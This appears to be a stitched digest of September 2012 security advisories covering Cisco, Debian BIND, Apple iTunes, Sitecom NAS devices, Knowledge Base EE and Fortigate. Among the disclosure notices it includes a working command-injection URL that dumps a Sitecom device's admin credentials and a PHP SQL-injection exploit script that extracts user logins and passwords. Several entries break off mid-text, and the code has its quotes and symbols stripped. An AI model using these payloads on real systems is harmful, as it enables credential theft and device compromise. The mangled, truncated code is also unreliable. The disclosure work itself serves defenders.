Cisco Security Advisory: Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability

Advisory ID: cisco-sa-20120912-asacx

Revision 1.0

For Public Release 2012 September 12 16:00  UTC (GMT)
+-

Summary
===

Cisco ASA-CX Context-Aware Security appliance and Cisco Prime Security
Manager (PRSM) contain a denial of service (DoS) vulnerability in
versions prior to 9.0.2-103.

Successful exploitation of this vulnerability on the Cisco ASA-CX
could cause the device to stop processing user traffic and prevent
management access to the Cisco ASA-CX. Successful exploitation of this
vulnerability on the Cisco PRSM could cause the software to become
unresponsive and unavailable.

There are no workarounds for this vulnerability, but some mitigations
are available.

Cisco has released free software updates that address this
vulnerability. 

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-asacx
-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)
Comment: GPGTools - http://gpgtools.org

iF4EAREIAAYFAlBQmfIACgkQUddfH3/BbTqiYwD/XvyTOxUAsm5SUk6SQz2gSvJQ
MRJ/YAAaW54eH5HykGwA/j19RyMKO9JLs5Hj+E6lDsbVjl4azUf2XkBI+Zt/jS+B
=eNJC
-END PGP SIGNATURE-

Cisco Security Advisory: Cisco Unified Presence and Jabber Extensible Communications Platform Stream Header Denial of Service Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Unified Presence and Jabber Extensible Communications Platform
Stream Header Denial of Service Vulnerability

Advisory ID: cisco-sa-20120912-cupxcp

Revision 1.0

For Public Release 2012 September 12 16:00  UTC (GMT)
+-

Summary
===

A denial of service (DoS) vulnerability exists in Cisco Unified
Presence and Jabber Extensible Communications Platform (Jabber XCP).
An unauthenticated, remote attacker could exploit this vulnerability
by sending a specially crafted Extensible Messaging and Presence
Protocol (XMPP) stream header to an affected server. Successful
exploitation of this vulnerability could cause the Connection Manager
process to crash.  Repeated exploitation could result in a sustained
DoS condition.

There are no workarounds available to mitigate exploitation of this
vulnerability.

Cisco has released free software updates that address this
vulnerability.  

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-cupxcp
-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)
Comment: GPGTools - http://gpgtools.org

iF4EAREIAAYFAlBQmfoACgkQUddfH3/BbTr41QEAiEtU1YJmRk9YpE1gC5mlqWDN
nfdqWNCjaeDKfgnJjYYA/jqFNpCPCHjUL4Oon847zNnduIW2CY9SBrWc9g2iYLNL
=qvOa
-END PGP SIGNATURE-

Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center

[mattijs]

Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home 
Storage Center

Severity Rating: High
Discovery Date: July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date: September 11, 2012

Vulnerability Type=
Arbitrary file upload

Impact=
Loss of system integrity

Severity=
Alcyon rates the severity of this vulnerability as high due to the following 
properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required.

Products and firmware versions affected=
- Sitecom MD-253 firmware version up to and including 2.4.17
- Sitecom MD-254 firmware version up to and including 2.4.17
- Possibly other rebranded Mapower network storage products

Risk Assessment=
An attacker can upload arbitrary files to the device. Combining the command 
injection vulnerability described in advisory AA-008 an attacker can obtain a 
remote root shell.

Vulnerability=
The CGI executable that is responsible for handling firmware updates allows 
arbitrary files to be uploaded to the /tmp folder. Furthermore the files are 
automatically assigned execute permissions and are owned by root.

Proof of Concept Exploit= 
PoC code exploiting this and other vulnerabilities to obtain an interactive 
root shell can be found here:
  - http://www.alcyon.nl/blog/sitecom-poc-exploit

Risk Mitigation=
At the time of disclosure no updated firmware version was available.

We recommend that you limit access to the web management UI of the device by 
utilizing proper packet filtering and/or NAT on your router in order to limit 
network access to your NAS. Note that this will not completely eliminate the 
risk of exploitation, since the product is affected by other vulnerabilities 
that can be leveraged using client side attacks.

Vendor responses=
None

Fixed Versions=
There is currently no vendor patch available. A third party solution is 
available on:
- http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/

Latest version of this advisory=
- http://www.alcyon.nl/advisories/aa-007

References=
Security Advisory AA-008: Command Injection Vulnerability in Sitecom Home 
Storage Center
- http://www.alcyon.nl/advisories/aa-008 

Security Advisory AA-007: Command Injection Vulnerability in Sitecom Home Storage Center

[mattijs]

Security Advisory AA-007: Command Injection Vulnerability in Sitecom Home 
Storage Center

Severity Rating: High
Discovery Date: July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date: September 12, 2012

Vulnerability Type=
Command injection

Impact=
System access

Severity=
Alcyon rates the severity of this vulnerability as high due to the following 
properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required.

Products and firmware versions affected=
- Sitecom MD-253 firmware version up to and including 2.4.17
- Sitecom MD-254 firmware version up to and including 2.4.17
- Possibly other rebranded Mapower network storage products

Risk Assessment=
An attacker can execute commands as the root user. This allows for the download 
and execution of arbitrary binaries and shell scripts to gain complete control 
over the device.

Vulnerability=
The installer.cgi script allows commands to be injected. A limitation exists in 
the fact that commands can only exist 

of characters that are not subject to URL-encoding. However, the hexadecimal 
representation of the space character (%20) gets converted to a space.

Proof of Concept Exploit=
Paste the following line into a browser address bar to display the device's 
admin credentials:

  
http://victimIP/cgi-bin/installer.cgi?SetExecTablecat%20/etc/sysconfig/config/webmaster.conf

PoC code exploiting this and other vulnerabilities to obtain an interactive 
root shell can be found here:
  - http://www.alcyon.nl/blog/sitecom-poc-exploit

Risk Mitigation=
At the time of disclosure no updated firmware version was available.

We recommend that you limit access to the web management UI of the device by 
utilizing proper packet filtering and/or NAT on your router in order to limit 
network access to your NAS. Note that this will not completely eliminate the 
risk of exploitation, since the product is affected by other vulnerabilities 
that can be leveraged using client side attacks.

Vendor responses=
None

Fixed Versions=
There is currently no vendor patch available. A third party solution is 
available on:
- http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/

Latest version of this advisory=
- http://www.alcyon.nl/advisories/aa-008

References=
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home 
Storage Center
- http://www.alcyon.nl/advisories/aa-007

[SECURITY] [DSA 2547-1] bind9 security update

[Florian Weimer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2547-1   secur...@debian.org
http://www.debian.org/security/Florian Weimer
September 12, 2012 http://www.debian.org/security/faq
- -

Package: bind9
Vulnerability  : improper assert
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-4244

It was discovered that BIND, a DNS server, does not handle DNS records
properly which approach size limits inherent to the DNS protocol.  An
attacker could use crafted DNS records to crash the BIND server
process, leading to a denial of service.

For the stable distribution (squeeze), this problem has been fixed in
version 1:9.7.3.dfsg-1~squeeze7.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJQUO2GAAoJEL97/wQC1SS+73sH/1cqWEgYuMvKkTy+vW1DuTqd
LOp7YcqQsHWKBW1DbE1WUy09k5fGeNNu+UhFITUoiHjXZIBtVen0g1pHfxAy2g59
Fo2dpJhoushOC57+4Sf+UJbfYO3Uv1zSTYYyCdiG9Df4AFOFLLPZvxIcCnjM+fhy
DksM/U9T4fwgx+N3vb1EvTK3FZXkaniOuB7GNl5REfxMi/8vCSigsOOeWlPHcnuc
SGJnYmuLpfCp+iSqCUzotDGlEL/HBVUozLXSVEPaKwEpc5dj7s+zJSFBt+FQij25
d6RRa1fetnzEGQSbocnko9DjiGeidkQIcmlAvFLy6i9XIsmyg6Xu5gN4/4P6To8=
=O6mH
-END PGP SIGNATURE-

APPLE-SA-2012-09-12-1 iTunes 10.7

[Apple Product Security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

APPLE-SA-2012-09-12-1 iTunes 10.7

iTunes 10.7 is now available and addresses the following:

WebKit
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description:  Multiple memory corruption issues existed in WebKit.
These issues are addressed through improved memory handling.
CVE-ID
CVE-2011-3016 : miaubiz
CVE-2011-3021 : Arthur Gerkis
CVE-2011-3027 : miaubiz
CVE-2011-3032 : Arthur Gerkis
CVE-2011-3034 : Arthur Gerkis
CVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur
Gerkis
CVE-2011-3036 : miaubiz
CVE-2011-3037 : miaubiz
CVE-2011-3038 : miaubiz
CVE-2011-3039 : miaubiz
CVE-2011-3040 : miaubiz
CVE-2011-3041 : miaubiz
CVE-2011-3042 : miaubiz
CVE-2011-3043 : miaubiz
CVE-2011-3044 : Arthur Gerkis
CVE-2011-3050 : miaubiz
CVE-2011-3053 : miaubiz
CVE-2011-3059 : Arthur Gerkis
CVE-2011-3060 : miaubiz
CVE-2011-3064 : Atte Kettunen of OUSPG
CVE-2011-3068 : miaubiz
CVE-2011-3069 : miaubiz
CVE-2011-3071 : pa_kt working with HP's Zero Day Initiative
CVE-2011-3073 : Arthur Gerkis
CVE-2011-3074 : Slawomir Blazek
CVE-2011-3075 : miaubiz
CVE-2011-3076 : miaubiz
CVE-2011-3078 : Martin Barbella of the Google Chrome Security Team
CVE-2011-3081 : miaubiz
CVE-2011-3086 : Arthur Gerkis
CVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz
CVE-2011-3090 : Arthur Gerkis
CVE-2011-3105 : miaubiz
CVE-2011-3913 : Arthur Gerkis
CVE-2011-3924 : Arthur Gerkis
CVE-2011-3926 : Arthur Gerkis
CVE-2011-3958 : miaubiz
CVE-2011-3966 : Aki Helin of OUSPG
CVE-2011-3968 : Arthur Gerkis
CVE-2011-3969 : Arthur Gerkis
CVE-2011-3971 : Arthur Gerkis
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-1520 : Martin Barbella of the Google Chrome Security Team
using AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com
working with iDefense VCP
CVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A.
Vazquez of spa-s3c.blogspot.com working with iDefense VCP
CVE-2012-2817 : miaubiz
CVE-2012-2818 : miaubiz
CVE-2012-2829 : miaubiz
CVE-2012-2831 : miaubiz
CVE-2012-2842 : miaubiz
CVE-2012-2843 : miaubiz
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3593 : Apple Product Security
CVE-2012-3594 : miaubiz
CVE-2012-3595 : Martin Barbella of Google Chrome Security
CVE-2012-3596 : Skylined of the Google Chrome Security Team
CVE-2012-3597 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3598 : Apple Product Security
CVE-2012-3599 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3600 : David Levin of the Chromium development community
CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3602 : miaubiz
CVE-2012-3603 : Apple Product Security
CVE-2012-3604 : Skylined of the Google Chrome Security Team
CVE-2012-3605 : Cris Neckar of the Google Chrome Security team
CVE-2012-3606 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3607 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3608 : Skylined of the Google Chrome Security Team
CVE-2012-3609 : Skylined of the Google Chrome Security Team
CVE-2012-3610 : Skylined of the Google Chrome Security Team
CVE-2012-3611 : Apple Product Security
CVE-2012-3612 : Skylined of the Google Chrome Security Team
CVE-2012-3613 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3614 : Yong Li of Research In Motion, Inc.
CVE-2012-3615 : Stephen Chenney of the Chromium development community
CVE-2012-3616 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3617 : Apple Product Security
CVE-2012-3618 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3620 : Abhishek Arya of Google Chrome Security Team
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3622 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3623 : Skylined of the Google Chrome Security Team
CVE-2012-3624 : Skylined of the Google Chrome Security Team
CVE-2012-3625 : Skylined of Google Chrome Security Team
CVE-2012-3626 : Apple Product Security
CVE-2012-3627 : Skylined and Abhishek Arya of Google Chrome Security
team
CVE-2012-3628 : Apple Product Security
CVE-2012-3629 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3630 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3631 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3632 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3633 : Martin Barbella of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3634 : Martin 

Knowledge Base EE v4.62.0 - SQL Injection Vulnerability

[Vulnerability Lab]

Title:
==
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability


Date:
=
2012-09-11


References:
===
http://www.vulnerability-lab.com/get_content.php?id=702


VL-ID:
=
702


Common Vulnerability Scoring System:

8.5


Introduction:
=
Knowledge Base Software, by Novo Solutions can be used in a variety of in-house 
and external application settings.  
Our easy-to-use software is an ideal solution for small or Knowledge Base 
Softwarelarge organizations who need a central 
repository to store information for Customer Support, Company Intranet, 
Employee Training, Document Management and more.

(copy from vendor website http://www.novosolutions.com/knowledge-base-software )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a critical sql 
vulnerability in the Knowledge Base Enterprise Edition v4.62.0.


Report-Timeline:

2012-09-06: Researcher Notification  Coordination
2012-09-07: Vendor Notification
2012-00-00: Vendor Response/Feedback
2012-00-00: Vendor Fix/Patch
2012-00-00: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A SQL Injection vulnerability  a misconfiguration are detected in Knowledge 
Base Enterprise Edition  4.62.0.
The vulnerability allows an attacker (remote) or local low privileged user 
account to inject/execute own sql commands 
on the affected application dbms without user inter action. The vulnerabilities 
are located in search module  when processing 
to request the category variable with selcategory argument. Successful 
exploitation of the vulnerability results in MSSQL dbms 
 ASP application compromise.

Vulnerable File(s):
[+] doadvancedsearch.asp

Vulnerable Parameter(s):
[+] category

Condition  
[+] selcategory - must be not NULL


Proof of Concept:
=
The sql injection vulnerability can be exploited by remote attackers without 
user inter action and without privilege user account.
For demonstration or reproduce ...

Note:
In this report we have the Clause statement it a little bit hard to exploit it 
because of 90% non active responses with errors.
In order to exploit this vulnerability we need to use  (CAST OR CONVERT) MSSQL 
functions to obtain result of our query in Conversion Error messages.


Query:  CAST(USER_LOGIN AS NVARCHAR(4000)
Result: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion 
failed when converting the nvarchar value 'admin' to data type int.


In the proof of concept exploit we have to change and force the query to 
retrieve users credential from user database requests.


?php
 error_reporting(0);
/*
 *  Software  Knowledge Base Enterprise Edition   4.62.00
 *  Database: MS SQL
 *  Description 
 *  Author   Kami
 *  Emailk...@vulnerability-lab.com
 *  Website  http://www.kami.ma
 *  vendor   http://www.novosolutions.com/knowledge-base-software/
 *  Exploitation-type  MSSQL error-based using .
 *  Exploitation-technique(CAST OR CONVERT) Via  (WHERE or HAVING) clause.
 */

/*  Define Target Informations  */
   
$HOST=$argv[1];  
$URI   =/doadvancedsearch.asp;

/*  DATABASE Params */

$TABLE =USERS;
$columns=array(USER_LOGIN,USER_PASSWORD); 
$evilSQL   =-6647)  UNION ALL SELECT 
CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name}
 AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) 
FROM USERS where USER_ID=1 --  ;

 

 $Exploit= new Exploitcore();

 
  if($argc  1) {
  echo \n.'[+] Exploitation Start
  
  \\\
.--.  /// 
(:::)(_)():-
`--°  \\\
  Exploit sent///
  
'.\n;

 if(isset($argv[2]))
 $URI=$argv[2].$URI;
 echo  [+] URL : .$argv[1].$argv[2].\n;
 $n=1;
foreach($columns as $column){
 
$evilSQL   =-6647)  UNION ALL SELECT 
CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name}
 AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) 
FROM USERS where USER_ID=1 --  ;

$evilSQL=str_replace({column_name},$column,$evilSQL);

$Payload=array(
advsearchwords=sds,
selcategory=19,
category=$evilSQL,
operation=%2B,
limit=25,
searchtype=1,
enableExclude=1,
enableInclude=1,
daterange=0,
  

Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

[Vulnerability Lab]

Title:
==
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities


Date:
=
2012-09-06


References:
===
http://www.vulnerability-lab.com/get_content.php?id=557


VL-ID:
=
557


Common Vulnerability Scoring System:

5


Introduction:
=
The FortiGate series of multi-threat security systems detect and eliminate the 
most damaging, content-based threats from email 
and Web traffic such as viruses, worms, intrusions, inappropriate Web content 
and more in real time - without degrading 
network performance.

Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 
series for large enterprises, service providers and 
carriers, the FortiGate line combines the FortiOS™ security operating system 
with FortiASIC processors and other hardware to provide 
a comprehensive and high-performance array of security and networking functions 
including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against 
network, content, and application-level threats - including 
complex attacks favored by cybercriminals - without degrading network 
availability and uptime. FortiGate platforms incorporate sophisticated 
networking features, such as high availability (active/active, active/passive) 
for maximum network uptime, and virtual domain (VDOM) 
capabilities to separate various networks requiring different security policies.

Since 2009 Fortigate appliance series got certified by the U.S. Army and is now 
listed in the 
Information Assurance Approved Products List (IA APL). The military provides 
high security 
standards to secure outdoor camps, air base, offices with fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )


Abstract:
=
Vulnerability-Lab Research Team discovered multiple persistent Web 
Vulnerabilities in the FortiGate UTM Appliance Application.


Report-Timeline:

2012-05-06: Researcher Notification  Coordination
2012-05-10: Vendor Notification
2012-06-11: Vendor Response/Feedback
2012-08-25: Vendor Fix/Patch ( Fixed in FortiOS v4.3.8 B0537  Fixed in 
FortiOS v5.0  )
2012-09-06: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortigate
Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple input validation vulnerabilities(persistent) are detected in the 
FortiGate UTM Appliance Application. Remote attackers 
 low privileged user accounts can inject (persistent) own malicious script 
code to manipulate specific customer/admin requests. 
The vulnerability allows an local low privileged attacker to  manipulate the 
appliance(application) via persistent script code 
inject. The vulnerability is locaed in the Add or Tags module category listing 
with the bound vulnerable applied tags  tags display parameters.
Successful exploitation results in content module request manipulation, 
execution of persistent malicious script code, session 
hijacking, account steal  persistent phishing.

Vulnerable Module(s): (Persistent)
[+] Tags - Applied tags 
[+] Add - Tags Display


Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B
FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B
 Series


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low 
required user inter action or low 
privileged user account. For demonstration or reproduce  ...


Code Review:Tags - Applied tags [Box]  Listing
URL:
http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=#

name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if 
(!fwad_form_check('Please choose one address/group.',
'Please choose one interface to connect.')) return false; if 
(document.forms[0].submitFlag) return false; document.forms[0].
submitFlag = true;``
tabletbodytr
td align=``left`` width=``150``nobrAddress Name/nobr/td
td align=``left``input 
name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text``
/td
/tr
tr
tdColor/td
tdspan colorclassprefix=``addr_ipv6_
`` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` 
id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` 
name=``csColor1``